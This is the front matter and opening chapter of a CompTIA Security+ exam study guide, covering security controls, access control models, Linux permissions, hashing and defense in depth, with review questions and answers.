Table of Contents

Table of Contents 2

Ian Neil 13

CompTIA Security+ Certification Guide 15

Why subscribe? 17

Packt.com 18

Contributor 19

About the author 20

Packt is searching for authors like you 21

Table of Contents 22

Preface 31

Who this book is for 32

What this book covers 33

To get the most out of this book 34

Download the color images 35

Conventions used 36

Get in touch 37

Reviews 38

Understanding Security Fundamentals 39

CIA triad concept 40

Identifying security controls 41

Administrative controls 42

Technical controls 43

Physical controls 44

Preventative controls 47

Deterrent controls 48

Detective controls 49

Corrective controls 50

Compensating controls 51

Access controls 52

Discretionary access control 53

Least privilege 55

Mandatory access control 56

Linux permissions (not SELinux) 57

Role-based access control 59

Rule-based access control 60

Attribute-based access control 61

Group-based access 62

Hashing and data integrity 63

Hash practical 65

Hash exercise 66

Defense in depth model 69

Review questions 70

Answers and explanations 72

Conducting Risk Analysis 75

Risk management 76

Importance of policy, plans, and procedures 77

Standard operating procedures 78

Agreement types 79

Personnel management—policies and procedures 81

Role—based awareness training 84

General security policies 85

Business impact analysis concepts 86

Privacy threshold assessment/privacy impact assessment 87

Mission—essential functions/identification of critical systems 88

Example 89

Supply chain risk assessment 90

Example 91

Business impact analysis concepts 92

Calculating loss 93

Example 94

Risk procedures and concepts 95

Threat assessment 96

Threat actors 97

Risk treatment 98

Risk register 100

Qualitative/quantitative risk analysis 101

Review questions 102

Answers and explanations 103

Implementing Security Policies and Procedures 106

Industry standard frameworks and reference architecture 107

OSI reference model 108

TCP/IP model 110

Types of frameworks 111

Benchmarks/secure configuration guides 113

Policies and user guides 114

Security configuration guides – web servers 116

Network infrastructure device user guides 117

General purpose guides 118

Implementing data security and privacy practices 120

Destroying data and sanitizing media  121

Data sensitivity labeling and handling 123

Data retention – legal and compliance 124

Data roles 125

Practical – creating a baseline 126

Review questions 131

Answers and explanations 133

Delving into Identity and Access Management 136

Understanding identity and access management concepts 137

Passwords 138

Default/administrator password 139

Passwords—group policy 140

Password recovery 142

Authentication factors 143

Number of factor examples 145

Transitive trust 146

Federation services 147

Shibboleth 150

Single sign-on 151

Installing and configuring identity and access services 152

LDAP 153

Kerberos 155

Internet-based open source authentication 157

Authentication, authorization, and accounting (AAA) servers 158

Authentication 159

Learning about Identity and access management controls 161

Biometrics 162

Security tokens and devices 165

Certification-based authentication 166

Port-based authentication 167

Common account management practices 168

Account types 169

Account creation 172

Employees moving departments 173

Disabling an account 174

Account recertification 175

Account maintenance 176

Account monitoring 177

Security Information and Event Management 178

Group based access control 181

Credential management 182

User account reviews 183

Practical exercise – password policy 184

Review questions 185

Answers and explanations 188

Understanding Network Components 192

OSI – reference model 194

Installing and configuring network components 196

Firewall 197

Router 200

Access control list– network devices 201

Intrusion-prevention system 202

Intrusion-detection system 203

Modes of detection 204

Modes of operation 205

Monitoring data 206

Switch 207

Layer 3 switch 209

Proxy server 210

Reverse proxy 212

Remote access 213

Virtual private network using L2TP/IPSec 214

IPSec 216

IPSec – handshake 217

VPN concentrator 218

Site-to-site VPN 219

VPN always on versus on-demand 220

SSL VPN 221

Split tunnelling 222

Load balancer 223

Clustering 225

Data-loss prevention 226

Security information and event management 227

Mail gateway 228

Cloud-based email 229

Media gateway 230

Hardware security module 231

Software-defined network 232

Secure network architecture concepts 233

Network address translation 235

Port address translation 236

Network access control (NAC) 237

Honeypot 239

Secure Socket Layer accelerators 240

SSL/TLS decryptor 241

Sensor/collector 242

Tap/port mirror 243

DDoS mitigator 244

Segregation/segmentation/isolation 245

Security device/technology placement 247

DMZ device placement 248

LAN device placement 249

Aggregation switches 250

Implementing secure protocols 251

Use case 255

File transfer – use case 256

Remote access – use case 257

Email – use case 258

Name resolution – use case 259

Hostname 260

DNSSEC 262

NETBIOS 263

Web – use case 264

Voice and video – use case 265

Network address allocation – use case 266

IP version 4 267

IP version 4 – lease process 269

IP version 4 lease process – troubleshooting 270

IP version 6 addressing 272

Subscription services – use case 273

Routing – use case 274

Time synchronization – use case 276

Directory services – use case 277

Active Directory 278

Switching – use case 280

Simple network management protocol – use case 281

Implementing wireless security 282

Wireless access points – controllers 283

Securing access to your wireless access point 284

Wireless bandwidth/band selection 286

Wireless channels 287

Wireless antenna types and signal strength 288

Wireless coverage 289

Wireless encryption 290

Wireless – open system authentication 291

Wireless – WPS 292

Wireless – captive portal 293

Wireless attacks 294

Wireless authentication protocols 295

Review questions 296

Answers and explanations 300

Understanding Cloud Models and Virtualization 305

Cloud computing 306

Implementing different cloud deployment models 309

Cloud service models 312

Disk resiliency and redundancy 317

Redundant array of independent disks 318

Storage area network 321

Understanding cloud storage concepts 323

Exploring virtual networks 324

Virtual desktop infrastructure 329

VDE 330

Heating, ventilation, and air-conditioning 331

Network environments 332

On-premises 333

Hosted services 334

Cloud-hosting services 335

Practical exercise – is the cloud cost-effective? 336

Review questions 337

Answer and explanations 339

Managing Hosts and Applications Deployment 341

Deploying mobile devices securely 343

Bring your own device 344

Choose your own device 346

Corporate-owned personally-enabled 347

Virtual desktop infrastructure 348

Mobile device connection methods 349

Mobile device management concepts 352

Accessing the device 353

Device management 354

Device protection 355

Device data 356

Mobile device enforcement and monitoring 357

Industrial control system 360

Supervisory control and data acquisition 361

Mobile devices – security implications of embedded systems 362

Special-purpose devices 365

Secure application development and deployment concepts 367

Development life cycle models – waterfall vs agile 369

Waterfall 370

Agile 371

Agile versus waterfall 372

DevOps 373

Secure DevOps 374

Secure coding techniques 375

Code quality and testing 378

Server-side versus client-side execution and validation 380

Review questions 381

Answers and explanations 384

Protecting Against Attacks and Vulnerabilities 388

Virus and malware attacks 390

Social engineering attacks 393

Common attacks 397

Application/service attacks 398

Programming attacks 404

Example 1—JavaScript—creating a money variable 406

Example 2—Javascript—setting the day of the month 407

Hijacking related attacks 410

Driver manipulation 412

Cryptographic attacks 413

Password attacks 414

Wireless attacks 416

Penetration testing 419

Penetration testing techniques 420

Vulnerability scanning concepts 421

Credentialed versus non-credentialed scans 423

Penetration testing versus vulnerability scanning 424

Practical exercise—running a vulnerability scanner 425

Review questions 431

Answers and explanations 434

Implementing Public Key Infrastructure 438

Public key infrastructure concepts 440

Certificate hierarchy 441

Certificate trust 445

Certificate validity 446

Certificate management concepts 447

Certificate types 449

Asymmetric and symmetric encryption 451

Encryption explained 452

Digital signature explained 456

Cryptography algorithms and their characteristics 458

Symmetric algorithms 459

Asymmetric algorithms 460

Symmetric versus asymmetric analogy 462

XOR encryption 463

Key stretching algorithms 464

Cipher modes 465

Stream versus block cipher analogy 466

Hashing and data integrity 468

Comparing and contrasting basic concepts of cryptography 469

Asymmetric – PKI 470

Asymmetric – weak/depreciated algorithms 471

Asymmetric – ephemeral keys 472

Symmetric algorithm – modes of operation 473

Symmetric encryption – stream versus block cipher 474

Symmetric encryption – confusion 475

Symmetric encryption – secret algorithm 476

Symmetric – session keys 477

Hashing algorithms 478

Crypto service provider 479

Crypto module 480

Protecting data 481

Basic cryptographic terminology 482

Obfuscation 483

Pseudo random number generator 484

Nonce 485

Perfect forward secrecy 486

Security through obscurity 487

Collision 488

Steganography 489

Diffusion 490

Implementation versus algorithm 491

Common use cases for cryptography 492

Supporting confidentiality 493

Supporting integrity 494

Supporting non-repudiation 495

Supporting obfuscation 496

Low-power devices 497

Low latency 498

High resiliency 499

Supporting authentication 500

Resource versus security constraints 501

Practical exercises 502

Practical exercise 1 – building a certificate server 503

Practical exercise 2—encrypting data with EFS and steal certificates 504

Practical exercise 3 – revoking the EFS certificate 505

Review questions 506

Answers and explanations 509

Responding to Security Incidents 513

Incident response procedures 514

Incident response process 516

Understanding the basic concepts of forensics 518

Five minute practical 520

Software tools to assess the security posture of an organization 524

Backup utilities 529

Backup types 530

Command-line tools 532

Analyzing and interpreting output from security technologies 539

Review questions 545

Answers and explanations 548

Managing Business Continuity 551

Implementing secure systems design 553

Hardware/firmware security 554

Operating systems 556

Securing IT systems 557

Peripherals 558

Importance of secure staging deployment concepts 559

Troubleshooting common security issues 561

Misconfigured devices 564

Personnel issues 565

Software issues 567

Disaster recovery and continuity of operations concepts 568

Review questions 571

Answers and explanations 573

Mock Exam 1 575

Mock Exam 2 586

Preparing for the CompTIA Security+ 501 Exam 599

Tips on taking the exam 600

Exam preparation 601

Practical 1—drag and drop—attacks 603

Practical 2—drag and drop—certificates 605

Practical 3—drag and drop—ports/protocol 607

Practical 4—drag and drop—authentication factors 609

Practical 5—drag and drop—general 610

Drag and drop—answers 612

Linux information 617

Acronyms 618

Assessment 625

Mock Exam 1 626

Mock Exam 2 645

Other Books You May Enjoy 667

Leave a review - let other readers know what you think 669

CompTIA Security+ Certification Guide


Master IT security essentials and exam topics for CompTIA Security+ SY0-501 certification










Ian Neil












BIRMINGHAM - MUMBAI

CompTIA Security+ Certification Guide

Copyright © 2018 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Commissioning Editor: Gebin George
Acquisition Editor: Rahul Nair
Content Development Editor: Arjun Joshi
Technical Editor: Varsha Shivhare
Copy Editor: Safis Editing
Project Coordinator: Kinjal Bari
Proofreader: Safis Editing
Indexer: Tejal Daruwale Soni
Graphics: Jisha Chirayil
Production Coordinator: Shraddha Falebhai

First published: September 2018

Production reference: 1290918

Published by Packt Publishing Ltd.
Livery Place
35 Livery Street
Birmingham
B3 2PB, UK.

ISBN 978-1-78934-801-9

www.packtpub.com



mapt.io

Mapt is an online digital library that gives you full access to over 5,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website.

Why subscribe?

Packt.com

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.packt.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at customercare@packtpub.com for more details.

At www.packt.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks. 

Contributor

About the author



Ian Neil is one of the world’s top trainers of Security+ 501 who has the ability to break down the information in manageable chunks helping no background knowledge. Ian was a finalist of the Learning and Performance Institute Trainer of the Year Awards. He has worked for the US Army in Europe and designed a Security+ course that catered to people from all backgrounds and not just the IT professional, with an extremely successful pass rate.

He was instrumental in helping Microsoft get their office in Bucharest off the ground, where he won a recognition award for being one of their top trainers. Ian is a MCT, MCSE, A+, Network+, Security+, CASP, and RESILIA practitioner who over the past 20 years has worked with highend training providers. 



Packt is searching for authors like you

If you're interested in becoming an author for Packt, please visit authors.packtpub.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.

Table of Contents

Title Page

Ian Neil

Copyright and Credits

CompTIA Security+ Certification Guide

Packt Upsell

Why subscribe?

Packt.com

Contributor

About the author

Packt is searching for authors like you

Preface

Who this book is for

What this book covers

To get the most out of this book

Download the color images

Conventions used

Get in touch

Reviews

  1. Understanding Security Fundamentals

CIA triad concept

Identifying security controls

Administrative controls

Technical controls

Physical controls

Preventative controls

Deterrent controls

Detective controls

Corrective controls

Compensating controls

Access controls

Discretionary access control

Least privilege

Mandatory access control

Linux permissions (not SELinux)

Role-based access control

Rule-based access control

Attribute-based access control

Group-based access

Hashing and data integrity

Hash practical

Hash exercise

Defense in depth model

Review questions

Answers and explanations

  1. Conducting Risk Analysis

Risk management

Importance of policy, plans, and procedures

Standard operating procedures

Agreement types

Personnel management—policies and procedures

Role—based awareness training

General security policies

Business impact analysis concepts

Privacy threshold assessment/privacy impact assessment

Mission—essential functions/identification of critical systems

Example

Supply chain risk assessment

Example

Business impact analysis concepts

Calculating loss

Example

Risk procedures and concepts

Threat assessment

Threat actors

Risk treatment

Risk register

Qualitative/quantitative risk analysis

Review questions

Answers and explanations

  1. Implementing Security Policies and Procedures

Industry standard frameworks and reference architecture

OSI reference model

TCP/IP model

Types of frameworks

Benchmarks/secure configuration guides

Policies and user guides

Security configuration guides – web servers

Network infrastructure device user guides

General purpose guides

Implementing data security and privacy practices

Destroying data and sanitizing media 

Data sensitivity labeling and handling

Data retention – legal and compliance

Data roles

Practical – creating a baseline

Review questions

Answers and explanations

  1. Delving into Identity and Access Management

Understanding identity and access management concepts

Passwords

Default/administrator password

Passwords—group policy

Password recovery

Authentication factors

Number of factor examples

Transitive trust

Federation services

Shibboleth

Single sign-on

Installing and configuring identity and access services

LDAP

Kerberos

Internet-based open source authentication

Authentication, authorization, and accounting (AAA) servers

Authentication

Learning about Identity and access management controls

Biometrics

Security tokens and devices

Certification-based authentication

Port-based authentication

Common account management practices

Account types

Account creation

Employees moving departments

Disabling an account

Account recertification

Account maintenance

Account monitoring

Security Information and Event Management

Group based access control

Credential management

User account reviews

Practical exercise – password policy

Review questions

Answers and explanations

  1. Understanding Network Components

OSI – reference model

Installing and configuring network components

Firewall

Router

Access control list– network devices

Intrusion-prevention system

Intrusion-detection system

Modes of detection

Modes of operation

Monitoring data

Switch

Layer 3 switch

Proxy server

Reverse proxy

Remote access

Virtual private network using L2TP/IPSec

IPSec

IPSec – handshake

VPN concentrator

Site-to-site VPN

VPN always on versus on-demand

SSL VPN

Split tunnelling

Load balancer

Clustering

Data-loss prevention

Security information and event management

Mail gateway

Cloud-based email

Media gateway

Hardware security module

Software-defined network

Secure network architecture concepts

Network address translation

Port address translation

Network access control (NAC)

Honeypot

Secure Socket Layer accelerators

SSL/TLS decryptor

Sensor/collector

Tap/port mirror

DDoS mitigator

Segregation/segmentation/isolation

Security device/technology placement

DMZ device placement

LAN device placement

Aggregation switches

Implementing secure protocols

Use case

File transfer – use case

Remote access – use case

Email – use case

Name resolution – use case

Hostname

DNSSEC

NETBIOS

Web – use case

Voice and video – use case

Network address allocation – use case

IP version 4

IP version 4 – lease process

IP version 4 lease process – troubleshooting

IP version 6 addressing

Subscription services – use case

Routing – use case

Time synchronization – use case

Directory services – use case

Active Directory

Switching – use case

Simple network management protocol – use case

Implementing wireless security

Wireless access points – controllers

Securing access to your wireless access point

Wireless bandwidth/band selection

Wireless channels

Wireless antenna types and signal strength

Wireless coverage

Wireless encryption

Wireless – open system authentication

Wireless – WPS

Wireless – captive portal

Wireless attacks

Wireless authentication protocols

Review questions

Answers and explanations

  1. Understanding Cloud Models and Virtualization

Cloud computing

Implementing different cloud deployment models

Cloud service models

Disk resiliency and redundancy

Redundant array of independent disks

Storage area network

Understanding cloud storage concepts

Exploring virtual networks

Virtual desktop infrastructure

VDE

Heating, ventilation, and air-conditioning

Network environments

On-premises

Hosted services

Cloud-hosting services

Practical exercise – is the cloud cost-effective?

Review questions

Answer and explanations

  1. Managing Hosts and Applications Deployment

Deploying mobile devices securely

Bring your own device

Choose your own device

Corporate-owned personally-enabled

Virtual desktop infrastructure

Mobile device connection methods

Mobile device management concepts

Accessing the device

Device management

Device protection

Device data

Mobile device enforcement and monitoring

Industrial control system

Supervisory control and data acquisition

Mobile devices – security implications of embedded systems

Special-purpose devices

Secure application development and deployment concepts

Development life cycle models – waterfall vs agile

Waterfall

Agile

Agile versus waterfall

DevOps

Secure DevOps

Secure coding techniques

Code quality and testing

Server-side versus client-side execution and validation

Review questions

Answers and explanations

  1. Protecting Against Attacks and Vulnerabilities

Virus and malware attacks

Social engineering attacks

Common attacks

Application/service attacks

Programming attacks

Example 1—JavaScript—creating a money variable

Example 2—Javascript—setting the day of the month

Hijacking related attacks

Driver manipulation

Cryptographic attacks

Password attacks

Wireless attacks

Penetration testing

Penetration testing techniques

Vulnerability scanning concepts

Credentialed versus non-credentialed scans

Penetration testing versus vulnerability scanning

Practical exercise—running a vulnerability scanner

Review questions

Answers and explanations

  1. Implementing Public Key Infrastructure

Public key infrastructure concepts

Certificate hierarchy

Certificate trust

Certificate validity

Certificate management concepts

Certificate types

Asymmetric and symmetric encryption

Encryption explained

Digital signature explained

Cryptography algorithms and their characteristics

Symmetric algorithms

Asymmetric algorithms

Symmetric versus asymmetric analogy

XOR encryption

Key stretching algorithms

Cipher modes

Stream versus block cipher analogy

Hashing and data integrity

Comparing and contrasting basic concepts of cryptography

Asymmetric – PKI

Asymmetric – weak/depreciated algorithms

Asymmetric – ephemeral keys

Symmetric algorithm – modes of operation

Symmetric encryption – stream versus block cipher

Symmetric encryption – confusion

Symmetric encryption – secret algorithm

Symmetric – session keys

Hashing algorithms

Crypto service provider

Crypto module

Protecting data

Basic cryptographic terminology

Obfuscation

Pseudo random number generator

Nonce

Perfect forward secrecy

Security through obscurity

Collision

Steganography

Diffusion

Implementation versus algorithm

Common use cases for cryptography

Supporting confidentiality

Supporting integrity

Supporting non-repudiation

Supporting obfuscation

Low-power devices

Low latency

High resiliency

Supporting authentication

Resource versus security constraints

Practical exercises

Practical exercise 1 – building a certificate server

Practical exercise 2—encrypting data with EFS and steal certificates

Practical exercise 3 – revoking the EFS certificate

Review questions

Answers and explanations

  1. Responding to Security Incidents

Incident response procedures

Incident response process

Understanding the basic concepts of forensics

Five minute practical

Software tools to assess the security posture of an organization

Backup utilities

Backup types

Command-line tools

Analyzing and interpreting output from security technologies

Review questions

Answers and explanations

  1. Managing Business Continuity

Implementing secure systems design

Hardware/firmware security

Operating systems

Securing IT systems

Peripherals

Importance of secure staging deployment concepts

Troubleshooting common security issues

Misconfigured devices

Personnel issues

Software issues

Disaster recovery and continuity of operations concepts

Review questions

Answers and explanations

  1. Mock Exam 1

  2. Mock Exam 2

Preparing for the CompTIA Security+ 501 Exam

Tips on taking the exam

Exam preparation

Practical 1—drag and drop—attacks

Practical 2—drag and drop—certificates

Practical 3—drag and drop—ports/protocol

Practical 4—drag and drop—authentication factors

Practical 5—drag and drop—general

Drag and drop—answers

Linux information

Acronyms

Assessment

Mock Exam 1

Mock Exam 2

Other Books You May Enjoy

Leave a review - let other readers know what you think

Preface

This book will help you to understand security fundamentals, ranging from the CIA triad right through to identity and access management. This book describes network infrastructure and how it is evolving with the implementation of virtualization and different cloud models and their storage. You will learn how to secure devices and applications that are used by a company. 

Refer www.ianneil501.com for additional exam resources.

Who this book is for

This book is designed for anyone who is seeking to pass the CompTIA Security+ SY0-501 exam. It is a stepping stone for anyone who wants to become a security professional or move into cyber security.

What this book covers

Chapter 1Understanding Security Fundamentals, covers some security fundamentals that will be expanded upon in later chapters.

Chapter 2Conducting Risk Analysis, looks at the types of threats and vulnerabilities, and at the roles that different threat actors play.

Chapter 3, Implementing Security Policies and Procedures, looks at reference architectures, different guides, and how best to dispose of data.

Chapter 4Delving into Identity and Access Management, looks at different types of authentication and how to dispose of data. We will first look at the concepts of identity and access management.

Chapter 5Understanding Network Components, examines networking components and how they could affect the security of your network. We will look at firewalls, switches, and routers. 

Chapter 6Understanding Cloud Models and Virtualization, teaches about virtualization, deployment, and security issues. We will get acquainted with various cloud models, looking at their deployment and storage environments. 

Chapter 7Managing Hosts and Applications Deployment, looks at different mobile devices and their characteristics, as well as the applications that run on these devices.

Chapter 8Protecting Against Attacks and Vulnerabilities, explores attacks and vulnerabilities, taking in turn each type of attack and its unique characteristics. This module is probably the most heavily tested module in the Security+ exam. 

Chapter 9Implementing Public Key Infrastructure, gets into the different encryption types and how certificates are issued and used. 

Chapter 10Responding to Security Incidents, deals with incident response, focusing on the collection of volatile evidence for forensic analysis.

Chapter 11Managing Business Continuity, turns its attention toward our business environment to consider the provision of systems availability, looking at selecting the most appropriate method for recovery following a disaster. 

Chapter 12, Mock Exam 1, includes mock questions, along with explanations, which will help in assessing whether you're ready for the test.

Chapter 13, Mock Exam 2, includes more mock questions, along with explanations, which will help in assessing whether you're ready for the test.

Appendix A, Preparing for the CompTIA Security+ 501 Exam, is included to help students pass the Security+ exam first time.

Appendix B, Acronyms, contains full forms of the abbreviations used in all the chapters. 

To get the most out of this book

This certification guide assumes no prior knowledge of the product. 

Download the color images

We also provide a PDF file that has color images of the screenshots/diagrams used in this book. You can download it here: http://www.packtpub.com/sites/default/files/downloads/9781789348019_ColorImages.pdf.

Conventions used

There are a number of text conventions used throughout this book.

CodeInText: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "For example, if we take the word pass in plaintext it may then be converted to UDVV; this way it is difficult to understand."

Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example: "The most common asymmetric algorithms include the Diffie Hellman, which creates a secure session so that symmetric data can flow securely. "

Warnings or important notes appear like this.

Tips and tricks appear like this.

Get in touch

Feedback from our readers is always welcome.

General feedback: If you have questions about any aspect of this book, mention the book title in the subject of your message and email us at customercare@packtpub.com.

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packt.com/submit-errata, selecting your book, clicking on the Errata Submission Form link, and entering the details.

Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at copyright@packt.com with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.



Reviews

Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at Packt can understand what you think about our products, and our authors can see your feedback on their book. Thank you!

For more information about Packt, please visit packt.com.

Understanding Security Fundamentals

In this chapter we will look at a number of security fundamentals, some of these will be expanded upon in later chapters. For the exam you will need to know all of the information in this book as the exam is fairly tricky. 

We will cover the following exam objectives in this chapter:

CIA triad concept

Most security books start with the basics of security by featuring the CIA triad—this is a model designed to guide policies for information security within an organization. It is a widely used security model and it stands for confidentiality, integrity, and availability; the three key principles that should be used to guarantee having a secure system:


Figure 1: CIA triad

Identifying security controls

There are a wide variety of different security controls that are used to mitigate the risk of being attacked; the three main security controls are technical, administrator, and physical. In this section, we are going to look at these in more detail; you need to be familiar with each of these controls and when each of them should be applied. Let's start by looking at the three main controls.

Administrative controls

Administrative controls are mainly written by managers to create organizational policies to reduce the risk within companies. Examples could be an internet-use policy so that the employees realize that the internet can only be used for company business and not used for social media during the working day. Another administrative control would be completing a form if you want to apply for a holiday; the form would be available from the forms library:

Administrative controls could be writing a policy, completing a form, and getting your ID badge re-keyed annually.

Technical controls

Technical controls are those implemented by the IT team to reduce risk to the business. These could include the following:

Technical controls could be installing a screensaver or configuring firewall rules.

Physical controls

Physical controls are controls that you can touch, for examples:

HVAC systems help provide availability to servers in the data center, ensuring they don't overheat.

Preventative controls

Preventative controls are in place to deter any attack; this could be having a security guard with a large dog walking around the perimeter of your company. This would make someone trying to break in think twice:

Deterrent controls

Deterrent controls could be CCTV and motions sensors. When someone is walking past a building and the motion sensors detect them, it turns lights on to deter them.

A building with a sign saying that it is being filmed with CCTV prevents someone from breaking into your premises, as they think they are being filmed, even though there may not be a camera inside—but they don't know that.

CCTV and motion sensors as deterrents. CCTV is a form of detective control following an incident, where you review the footage to see how the incident happened.

Detective controls

Detective controls are used to investigate an incident that has happened and needs to be investigated; these could include the following:

Corrective controls

Corrective controls are the actions you take to recover from an incident. You may lose a hard drive that contained data; in that case, you would replace the data from a backup you had previously taken.

Fire-suppression systems are another form of corrective control. You may have had a fire in your data center that has destroyed many servers, therefore when you purchase a replacement, you may install an oxygen-suppressant system. This method uses argon/nitrogen and sometimes a small element of CO2 to displace the oxygen in the server room. The basis of this method is to reduce the oxygen level to below 15% because it will suppress a fire.

Compensating controls

Compensating controls can be called alternative controls; this is a mechanism that is put in place to satisfy the requirements of a security measure that is deemed too difficult or impractical to implement at the present time. It is similar to when you go shopping and you have $100 in cash—once you have spent your cash, you will have to use a credit card as a compensating control.

An example of this is where a new person has just been employed by the company where the normal way to log in is to use a smart card and PIN. This resembles a bank card with a chip where you insert it into your laptop or keyboard and then insert a PIN to log in. Maybe it takes 3-5 days to get a new smart card, so during the waiting period, they may log in using a username and password:


Access controls

The three main parts of access controls are identifying an individual, authenticating them when they insert a password or PIN, and then authorization, where an individual has different forms of access to different data. For example, someone working in finance will need a higher level of security clearance and have to access different data than the person who dispatched an order in finished goods:

Discretionary access control

Discretionary access control involves New Technology File System (NTFS) file permissions, which are used in Microsoft operating systems. The user is only given the access that he/she needs to perform their job.

The permissions are as follows:


Least privilege

Least privilege is where you give someone only the limited access level required so that they can perform their job role; this is known as the need to know basis. The company will write a least privilege policy so that the administrators know how to manage it.

Mandatory access control

Mandatory Access Control (MAC) is based on the classification level of the data. This looks at how much damage they could cause to the interest of the nation. These are as follows:

Examples of Mandatory Access Control (MAC):

Data types

Classification

Nuclear energy project

Top secret

Research and development

Secret

Ongoing legal issues

Confidential

Government payroll

Restricted

Linux permissions (not SELinux)

File permissions: Linux permissions come in a numerical format; the first number represents the owner, the second number represents the group, and the third number represents all other users:

Unlike a Windows permission that will execute an application, the execute function in Linux allows you to view or search.

A permission of 6 would be read and write. A value of 2 would be write, and a value of 7 would be read, write, and execute. Some examples are as follows:

When selecting the highest, you look at the value on the left, therefore the highest is the value of 777 is full control.

When selecting the lowest, you look at the lowest value on the left. There are two options here: d and e start with the lowest number, and then you look at the others. From here, you can see that answer e is the lowest.

The higher the number, the higher the permissions; the lowest number is the one with the lesser permissions.

You can also change permissions in Linux: If the permission to File C is 654 and we wish to change the permissions, we will run the Chmod 777 File A command, which changes the permissions to File C.


Role-based access control

This is a subset of duties within a department. An example would be two people with the finance department who only handle the petty cash. In IT, terms it could be that only two of the IT team administer the email server.

Rule-based access control

In Rule-Based Access Control (RBAC), a rule is applied to all of the people within, for example, contractors will only have access between 8 a.m. and 5 p.m., and the help desk people will only be able to access Building 1, where their place of work is. It can be time-based or have some sort of restriction, but it applies to the whole department.

Attribute-based access control

In Attribute-Based Access Control (ABAC), access is restricted based on an attribute in the account. John could be an executive and some data could be restricted to only those with the executive attribute.

Group-based access

To control access to data, people may be put into groups to simplify access. An example would be if there were two people who worked in Information Technology (IT) who needed access to the older IT data. These people are called Bill and Ben:


Everyone in the sales team may have full control of the sales data by using group-based access, but you may need two new starters to have only read access. In this case, you would create a group called new starters and give those people inside that group only read permission to the data.


If access to data is done via group-based access, then any solution in the exam will be a group-based answer.

Hashing and data integrity

Can you read data that has been hashed? Hashing does not hide the data as a digitally signed email could still be read—it only verifies integrity. If you wish to stop someone reading the email in transit, you need to encrypt it.

Hash practical

The reason that we hash a file is to verify its integrity so that we know if someone has tampered with it.

Hash exercise

In this exercise, we have a file called data.txt. First of all, I use a free MD5 hashing tool and browse to the data.txt file, which generates a hash value. I have also created a folder called Move data to here:

  1. Get the original hash:


  1. Copy the hash from the current hash value to the original hash value.

  1. Copy the data.txt file to the Move data to here folder, then go to the MD5 hash software and browse to the data.txt file in the new location, then press verify. The values should be the same as shown here:


The values are the same, therefore we know the integrity of the data is intact and has not been tampered with during moving the readme.txt file.

  1. Next, we go into the data.txt file and change a single character, add an extra dot at the end of a sentence, or even enter a space that cannot be seen. We then take another hash of the data and we will then see that the hash value is different and does not match; this means that the data has been tampered with:


Defense in depth model

Defense in depth is the concept of protecting a company's data with a series of defensive layers so that if one layers fails, another layer will already be in place to thwart an attack. We start with our data, then we encrypt it to protect it:

Therefore, before someone can steal the data, they have seven layers of security that they must pass through. The concept of defense in depth is that if one layer fails, then the next layer protects:


Review questions

  1. What are the three components of the CIA triad?

  2. Why might a CCTV camera be sited outside a building without any film inside?

  3. What does confidentiality mean?

  4. How can we protect a data center from people entering it?

  5. What is the purpose of an airgap?

  6. Name three administrative controls.

  7. Name three physical controls.

  8. Following an incident, what type of control will be used when researching how the incident happened?

  9. How do I know if the integrity of my data is intact?

  1. What is a corrective control?

  2. What is the purpose of hashing?

  3. If i hash the same data with different SHA1 applications, what will the output be?

  4. What two things does HMAC provide?

  5. What type of control is it when I change the firewall rules?

  6. What is used to log into a system that works in conjunction with a PIN?

  7. What is the name of the person who looks after classified data and who is the person that gives people access to the classified data?

  8. When you use a DAC model for access, who determines who gains access to the data?

  9. What is least privilege?

  10. What access control method does SELinux utilize?

  11. What is the Linux permission of 777? What access does it give you?

  12. What does the Linux permission execute allow me to do?

  13. The sales are allowed to log into the company between 9 a.m. and 10 p.m. What type of access control is being used?

  14. Two people from the finance team are only allowed to authorize the payment of cheques; what type of access control are they using?

  15. What is the purpose of the defense in depth model?

  16. When someone leaves the company what is the first thing we should do with their user account?

Answers and explanations

  1. Confidentiality means only allowing those authorized to access data gain access. Integrity means that data has not been tampered with. Availability means that data is available when you need it, for example purchasing an airline ticket.

  2. We could place a CCTV camera in a prominent location as a deterrent, people walking past cannot tell if it has film or not, we are using it as a deterrent.

  3. Confidentiality means that we are limiting access to data to only those who should have access.

  4. To stop people entering a datacenter, we would install a mantrap a turnstile device so that we can control who accessed the datacenter one at a time.

  5. An airgap is what it says on the tin, it is a gap between your network and a machinee would use an airgap maybe between Research and Development Machine and the corporate network.

  6. Administrative controls could be writing a new Policy to make the company run smooth; we may have just implemented change management. You could implement a new form to ensure that all of the data required for an application is supplied. We could run an annual security awareness training day, complete risk assessment, or penetration testing.

  7. Physical control is huge. Remember that these can be physically touched. You can choose three from: cable locks, laptop safe, biometric locks, fences, gates, burglar alarms, fire alarms, lights, security guards, bollards, barricades, a faraday cage, key management, proximity cards, tokens, HVAC, an airgap, motions sensors, and cameras and biometric devices such as an iris scanner.

  8. If we investigate an incident, we need to collect all of the facts about the incident; this is a detective control. Think of a detective such as Sherlock Holmes who is always investigating mysteries.

  9. If we hash the data before and after, and the hash value remains the same, then integrity of the data is intact. If the second hash is different, the data has been tampered with.

